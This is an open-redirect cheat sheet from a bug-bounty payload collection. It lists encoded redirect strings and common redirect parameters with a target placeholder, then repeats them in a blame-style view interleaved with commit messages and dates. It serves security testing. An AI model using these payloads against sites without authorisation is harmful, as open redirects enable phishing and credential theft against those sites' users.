bugbounty-cheatsheet/cheatsheets/open-redirect.md

## Open Redirect

```
/%09/google.com
```

```
/%5cgoogle.com
```

```
//www.google.com/%2f%2e%2e
```

```
//www.google.com/%2e%2e
```

```
//google.com/
```

```
//google.com/%2f..
```

## Possible open redirect parameters

```
?url=http://{target}
```

```
?url=https://{target}
```

```
?next=http://{target}
```

```
?next=https://{target}
```

```
?url=https://{target}
```

```
?url=http://{target}
```

```
?url=//{target}
```

```
?url=$2f%2f{target}
```

```
?next=//{target}
```

```
?next=$2f%2f{target}
```

```
?url=//{target}
```

```
?url=$2f%2f{target}
```

```
?url=//{target}
```

```
/redirect/{target}
```

```
/cgi-bin/redirect.cgi?{target}
```

```
/out/{target}
```

```
/out?{target}
```

```
/out?/{target}
```

```
/out?//{target}
```

```
/out?/\{target}
```

```
/out?///{target}
```

```
?view={target}
```

```
?view=/{target}
```

```
?view=//{target}
```

```
?view=/\{target}
```

```
?view=///{target}
```

```
/login?to={target}
```

```
/login?to=/{target}
```

```
/login?to=//{target}
```

```
/login?to=/\{target}
```

```
/login?to=///{target}
```


**Open Redirect Payloads** by @cujanovic

https://github.com/cujanovic/Open-Redirect-Payloads


**Open Redirect Paramters** by @fuzzdb-project

https://github.com/fuzzdb-project/fuzzdb/blob/master/attack/redirect/redirect-urls-template.txt
Add individual files. 2017-07-14 14:54:44 +01:00			`## Open Redirect`

			```
			`/%09/google.com`
			```

			```
			`/%5cgoogle.com`
			```
Apply style guide to open-redirect.md. 2017-07-16 12:48:35 +01:00
Update open-redirect.md 2017-07-16 13:37:01 +03:00			```
Add individual files. 2017-07-14 14:54:44 +01:00			`//www.google.com/%2f%2e%2e`
			```

			```
			`//www.google.com/%2e%2e`
Update open-redirect.md 2017-07-16 13:37:01 +03:00			```
Add two extra OR strings 2017-08-16 09:16:00 +01:00
			```
			`//google.com/`
			```

			```
			`//google.com/%2f..`
			```
Update open-redirect.md 2017-09-27 17:48:44 +02:00
Update open-redirect.md Added open redirect parameters 2017-10-25 20:19:49 +02:00			`## Possible open redirect parameters`

			```
			`?url=http://{target}`
			```

			```
			`?url=https://{target}`
			```

			```
			`?next=http://{target}`
			```

			```
			`?next=https://{target}`
			```

			```
			`?url=https://{target}`
			```

			```
			`?url=http://{target}`
			```

			```
			`?url=//{target}`
			```

			```
			`?url=$2f%2f{target}`
			```

			```
			`?next=//{target}`
			```

			```
			`?next=$2f%2f{target}`
			```

			```
			`?url=//{target}`
			```

			```
			`?url=$2f%2f{target}`
			```

			```
			`?url=//{target}`
			```

			```
			`/redirect/{target}`
			```

			```
			`/cgi-bin/redirect.cgi?{target}`
			```

			```
			`/out/{target}`
			```

			```
			`/out?{target}`
			```

			```
			`/out?/{target}`
			```

			```
			`/out?//{target}`
			```

			```
			`/out?/\{target}`
			```

			```
			`/out?///{target}`
			```

			```
			`?view={target}`
			```

			```
			`?view=/{target}`
			```

			```
			`?view=//{target}`
			```

			```
			`?view=/\{target}`
			```

			```
			`?view=///{target}`
			```

			```
			`/login?to={target}`
			```

			```
			`/login?to=/{target}`
			```

			```
			`/login?to=//{target}`
			```

			```
			`/login?to=/\{target}`
			```

			```
			`/login?to=///{target}`
			```


Update open-redirect.md 2017-09-27 17:48:44 +02:00
			`Open Redirect Payloads by @cujanovic`

			`https://github.com/cujanovic/Open-Redirect-Payloads`
Update open-redirect.md Added open redirect parameters 2017-10-25 20:19:49 +02:00

			`Open Redirect Paramters by @fuzzdb-project`

			`https://github.com/fuzzdb-project/fuzzdb/blob/master/attack/redirect/redirect-urls-template.txt`